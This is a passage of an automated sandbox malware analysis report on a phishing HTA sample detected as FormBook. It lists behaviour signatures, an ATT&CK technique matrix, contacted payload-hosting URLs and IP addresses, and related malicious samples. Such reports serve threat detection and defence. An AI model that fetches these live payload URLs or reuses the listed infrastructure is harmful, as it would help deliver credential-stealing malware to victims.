Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2534332351.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2535434593.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2534332351.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2535434593.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	12 Command and Scripting Interpreter	111 Scripting	211 Process Injection	1 Masquerading	OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 PowerShell	Logon Script (Windows)	Logon Script (Windows)	211 Process Injection	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
createdbetterthingswithgreatnressgivenmebackwithnice.hta	31%	Virustotal		Browse
createdbetterthingswithgreatnressgivenmebackwithnice.hta	16%	ReversingLabs	Script-JS.Phishing.Generic

Source	Detection	Scanner	Label	Link
http://172.245.123.12/233/createdbestthingswithenergylevelgoodforbusinesspuropse.tIFll	0%	Avira URL Cloud	safe
http://172.245.123.12/233/create	0%	Avira URL Cloud	safe
https://www.google.com;	0%	Avira URL Cloud	safe
http://172.245.123.12/233/createdbestthingswithenergylevelgoodforbusinesspuropse.tIFv	0%	Avira URL Cloud	safe
https://analytics.paste.ee	0%	Avira URL Cloud	safe
http://172.245.123.12/233/createdbestthingswithenergylevelgoodforbusinesspuropse.tIF	0%	Avira URL Cloud	safe
http://172.245.123.12/233/createdbestthingswithenergylevelgoodforbusinesspuropse.tIFGetLMEM	0%	Avira URL Cloud	safe
https://analytics.paste.ee;	0%	Avira URL Cloud	safe
https://analytics.paste.ee	1%	Virustotal		Browse
https://cdnjs.cloudflare.com;	0%	Avira URL Cloud	safe
http://crl.micror	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
paste.ee	104.21.84.67	true	false	high
cloudinary.map.fastly.net	151.101.1.137	true	false	high
res.cloudinary.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://paste.ee/r/et2L1/0	false		high
http://172.245.123.12/233/createdbestthingswithenergylevelgoodforbusinesspuropse.tIF	true	Avira URL Cloud: safe	unknown
https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000003.00000002.2234262230.00000000057A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2501733594.0000000005239000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000003.00000002.2228926984.0000000004898000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000007.00000002.2501733594.0000000004327000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000003.00000002.2228926984.0000000004898000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000007.00000002.2501733594.0000000004327000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000007.00000002.2501733594.0000000005239000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com;	powershell.exe, 00000007.00000002.2501733594.0000000004327000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000007.00000002.2501733594.0000000005239000.00000004.00000800.00020000.00000000.sdmp	false		high
https://analytics.paste.ee	powershell.exe, 00000007.00000002.2501733594.0000000004327000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://172.245.123.12/233/create	powershell.exe, 00000003.00000002.2228926984.0000000004B67000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://go.micros	powershell.exe, 00000003.00000002.2228926984.0000000004D80000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000007.00000002.2501733594.0000000004327000.00000004.00000800.00020000.00000000.sdmp	false		high
http://172.245.123.12/233/createdbestthingswithenergylevelgoodforbusinesspuropse.tIFll	powershell.exe, 00000003.00000002.2237841255.0000000007DBD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com	powershell.exe, 00000007.00000002.2501733594.0000000004327000.00000004.00000800.00020000.00000000.sdmp	false		high
https://res.cloudinary.com	powershell.exe, 00000007.00000002.2501733594.0000000004327000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000003.00000002.2228926984.0000000004741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2501733594.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://172.245.123.12/233/createdbestthingswithenergylevelgoodforbusinesspuropse.tIFv	powershell.exe, 00000003.00000002.2236379284.0000000006FC8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpgt	powershell.exe, 00000007.00000002.2501733594.0000000004327000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000003.00000002.2228926984.0000000004898000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000007.00000002.2501733594.0000000005239000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000003.00000002.2234262230.00000000057A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2501733594.0000000005239000.00000004.00000800.00020000.00000000.sdmp	false		high
http://172.245.123.12/233/createdbestthingswithenergylevelgoodforbusinesspuropse.tIFGetLMEM	powershell.exe, 00000003.00000002.2237771463.0000000007D70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://analytics.paste.ee;	powershell.exe, 00000007.00000002.2501733594.0000000004327000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com	powershell.exe, 00000007.00000002.2501733594.0000000004327000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdnjs.cloudflare.com;	powershell.exe, 00000007.00000002.2501733594.0000000004327000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000003.00000002.2228926984.0000000004741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2501733594.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.gravatar.com	powershell.exe, 00000007.00000002.2501733594.0000000004327000.00000004.00000800.00020000.00000000.sdmp	false		high
https://themes.googleusercontent.com	powershell.exe, 00000007.00000002.2501733594.0000000004327000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micror	powershell.exe, 00000007.00000002.2538077937.0000000006DA5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/dahall/taskscheduler	powershell.exe, 00000007.00000002.2501733594.000000000537E000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
151.101.1.137	cloudinary.map.fastly.net	United States	54113	FASTLYUS	false
104.21.84.67	paste.ee	United States	13335	CLOUDFLARENETUS	false
172.245.123.12	unknown	United States	36352	AS-COLOCROSSINGUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1576454
Start date and time:	2024-12-17 07:20:13 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	createdbetterthingswithgreatnressgivenmebackwithnice.hta
Detection:	MAL
Classification:	mal100.phis.troj.expl.evad.winHTA@18/16@2/3
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 99% Number of executed functions: 43 Number of non-executed functions: 234
Cookbook Comments:	Found application associated with file extension: .hta

Warnings

Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target mshta.exe, PID 5844 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:21:14	API Interceptor	110x Sleep call for process: powershell.exe modified
01:21:53	API Interceptor	3x Sleep call for process: aspnet_compiler.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
151.101.1.137	greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse
	goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta	Get hash	malicious	Cobalt Strike, FormBook	Browse
	creamkissingthingswithcreambananapackagecreamy.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse
	Euro confirmation Sp.xls	Get hash	malicious	Unknown	Browse
	stage2.ps1	Get hash	malicious	PureLog Stealer, RevengeRAT, zgRAT	Browse
	nicegirlforyou.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse
	Invoice A037.xls	Get hash	malicious	Unknown	Browse
	Orden_de_Compra_Nmero_6782929219.xls	Get hash	malicious	HTMLPhisher	Browse
	Aktarma,pdf.vbs	Get hash	malicious	Remcos	Browse
	16547.js	Get hash	malicious	MassLogger RAT	Browse
104.21.84.67	Order_DEC2024.wsf	Get hash	malicious	Remcos	Browse	paste.ee/d/GXRLA
	nr101612_Order.wsf	Get hash	malicious	Remcos	Browse	paste.ee/d/81FCf
	Doc261124.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	paste.ee/d/MQJcS
	Chitanta bancara - #113243.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/u4bvR
	rdevuelto_Pagos.wsf	Get hash	malicious	AgentTesla	Browse	paste.ee/d/SDfNF
	Product list 0980DF098A7.xls	Get hash	malicious	Unknown	Browse	paste.ee/d/enGXm
	Payment_advice.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/wXm0Y
	SHREE GANESH BOOK SERVICES-347274.xls	Get hash	malicious	Unknown	Browse	paste.ee/d/eA3FM
	dereac.vbe	Get hash	malicious	Unknown	Browse	paste.ee/d/JZHbW
	P018400.xla.xlsx	Get hash	malicious	Unknown	Browse	paste.ee/d/kmRFs
172.245.123.12	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	172.245.123.12/233/eec/createdbetterthingswithgreatnressgivenmebackwithnice.hta
	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	172.245.123.12/233/eec/createdbetterthingswithgreatnressgivenmebackwithnice.hta
	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	172.245.123.12/233/eec/createdbetterthingswithgreatnressgivenmebackwithnice.hta
	seemebestgoodluckthings.hta	Get hash	malicious	Cobalt Strike, FormBook, HTMLPhisher	Browse	172.245.123.12/361/TELNERA.txt
	PI-02911202409#.xla.xlsx	Get hash	malicious	FormBook, HTMLPhisher	Browse	172.245.123.12/361/TELNERA.txt

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cloudinary.map.fastly.net	PO_0099822111ORDER.js	Get hash	malicious	Remcos	Browse	151.101.193.137
	NB PO-104105107108.xls	Get hash	malicious	Unknown	Browse	151.101.193.137
	greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	151.101.1.137
	goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta	Get hash	malicious	Cobalt Strike, FormBook	Browse	151.101.1.137
	creamkissingthingswithcreambananapackagecreamy.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	151.101.1.137
	Cot90012ARCACONTAL.xls	Get hash	malicious	Remcos	Browse	151.101.129.137
	Euro confirmation Sp.xls	Get hash	malicious	Unknown	Browse	151.101.1.137
	stage2.ps1	Get hash	malicious	PureLog Stealer, RevengeRAT, zgRAT	Browse	151.101.193.137
	nicegirlforyou.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	151.101.1.137
	invoice09850.xls	Get hash	malicious	Remcos	Browse	151.101.65.137
paste.ee	givenbestupdatedoingformebestthingswithgreatnewsformegive.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	104.21.84.67
	clearentirethingwithbestnoticetheeverythinggooodfrome.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	172.67.187.200
	PO_0099822111ORDER.js	Get hash	malicious	Remcos	Browse	104.21.84.67
	NB PO-104105107108.xls	Get hash	malicious	Unknown	Browse	188.114.96.6
	greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	104.21.84.67
	goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta	Get hash	malicious	Cobalt Strike, FormBook	Browse	172.67.187.200
	creamkissingthingswithcreambananapackagecreamy.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	104.21.84.67
	Cot90012ARCACONTAL.xls	Get hash	malicious	Remcos	Browse	188.114.97.6
	SOA USD67,353.35.xla.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.6
	Euro confirmation Sp.xls	Get hash	malicious	Unknown	Browse	188.114.96.6

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FASTLYUS	ORDER-24171200967.XLS..js	Get hash	malicious	WSHRat, Caesium Obfuscator, STRRAT	Browse	199.232.196.209
	https://ivsmn.kidsavancados.com/	Get hash	malicious	Unknown	Browse	151.101.131.6
	https://uvcr.ovactanag.ru/jQXv/	Get hash	malicious	Unknown	Browse	151.101.130.137
	https://dot.itsecuritymessages.com/45sf4657dvz4hn/afc6c7/00179cbf-581d-4c00-98d3-bf1104b204ad	Get hash	malicious	Unknown	Browse	151.101.2.109
	https://link.mail.beehiiv.com/ls/click?upn=u001.8ULyQR0JYqJFmtAcEKOwZJrtx6Pg-2FFIdL75Xr8cQplPy1BwMP6K04UCj8Y6BqsqIO5QCbkskm97LegF2duW8h-2B7y0wF2E-2BDZNcbzCPIVszT1GD6EOVy0YRZV55MI3rlD0kPZAiaJ0IK1-2FMU2lgPk2Kii32mX86fkDuIDK9GPx4-2FfuyI6JAqdMrtQqIbvs2W-2FN4SKHyAe889o909j2BgEQTYHmZASxysFG5X1abiH-2Bc9UXRQ1Ein-2BS-2BlY0g6W3s6a-2Bg8fspAfccvSCNZ8UZez1w-3D-3DUR2i_K8Qrv2qBC50DA374Af0scmFKIlSM-2Bv5ewezTCdQ-2FHdeUjmHtY3NrJD1TBTC8B4zB5HyIT-2F4sQexLT4eDcDNpHTw1Uv6zyerCF2l6Qv2QnUXIFi1vgFIVZbyXm-2Fb4OHwN5YbpoyTJNqIBeZHgSrlo7M6ZizbyF9nigOzGQDcMUgYHM7Aiblgmi6ZZqeS-2F4eQTcSMrquYcXkgDnpAgjrAXvqys7q9tGDujdSY7rWu7e2v-2B8ZqylkvKbnTnsoe7xpWX2CCdK7-2Ffs69cITr47FLMcG63ztEATsgzr65zgaz1vTU66UCHiyx70Gk8JDD2YjXZuzQvmiRgDA-2FXjbWgjk3i1v2Ulq6y1yKgmK1yrN5XfmHVDLnIEf-2BjigPUThjsOSZZpY0Q2K61IDWrFAR0MbUNzwiY-2FVg-2BeuZ5GmE7khj3oFCj0ivt137LdIBat61ZEFDp	Get hash	malicious	Unknown	Browse	151.101.194.137
	https://afg.acemlnb.com/lt.php?x=3TZy~GE3UnGZEpJA-w9HgOSc2K2ji_L0wu1gjqXGIXSh587-zEy.zuJr1Y2iitE~judAXHPHJeTMHaWtOdxFVOFx23MoiND	Get hash	malicious	Unknown	Browse	151.101.129.140
	https://nq.trikeunpured.com/iSH5pdvbnvr/kmgeL	Get hash	malicious	Unknown	Browse	151.101.129.74
	Tbconsulting Company Guidelines Employee Handbook.docx	Get hash	malicious	Unknown	Browse	151.101.120.157
	FINAL000035745873695487KHFKA.pdf	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	Remit_Advice_SMKT_84655.htm	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
AS-COLOCROSSINGUS	ORDER-24171200967.XLS..js	Get hash	malicious	WSHRat, Caesium Obfuscator, STRRAT	Browse	192.3.220.6
	newthingswithgreatupdateiongivenbestthingswithme.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	107.173.4.16
	crreatedbestthingswithgreatattitudeneedforthat.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	107.173.4.16
	Smple_Order-048576744759475945.xls	Get hash	malicious	Unknown	Browse	192.3.179.166
	Smple_Order-048576744759475945.xls	Get hash	malicious	Unknown	Browse	192.3.179.166
	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	172.245.123.12
	Sample_Order_000000991.xls	Get hash	malicious	Unknown	Browse	192.3.179.166
	Smple_Order-048576744759475945.xls	Get hash	malicious	Unknown	Browse	192.3.179.166
	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	172.245.123.12
	Sample_Order_000000991.xls	Get hash	malicious	Unknown	Browse	192.3.179.166
CLOUDFLARENETUS	ppc.elf	Get hash	malicious	Mirai, Moobot	Browse	172.65.156.157
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig	Browse	104.21.2.110
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse	172.67.129.27
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	188.114.97.3
	https://tinyurl.com/5faazntx	Get hash	malicious	Unknown	Browse	104.18.111.161
	https://solve.jenj.org/awjxs.captcha?u=001e7d38-a1fc-47e3-ac88-6df0872bfe2d	Get hash	malicious	Unknown	Browse	104.21.16.207
	gkcQYEdJSO.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.38.84
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig	Browse	104.21.2.110
	https://ivsmn.kidsavancados.com/	Get hash	malicious	Unknown	Browse	104.18.94.41
	https://uvcr.ovactanag.ru/jQXv/	Get hash	malicious	Unknown	Browse	104.17.25.14

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.84.67 151.101.1.137
	drivers.exe	Get hash	malicious	Unknown	Browse	104.21.84.67 151.101.1.137
	GameBoxMini.exe	Get hash	malicious	Unknown	Browse	104.21.84.67 151.101.1.137
	drivers.exe	Get hash	malicious	Unknown	Browse	104.21.84.67 151.101.1.137
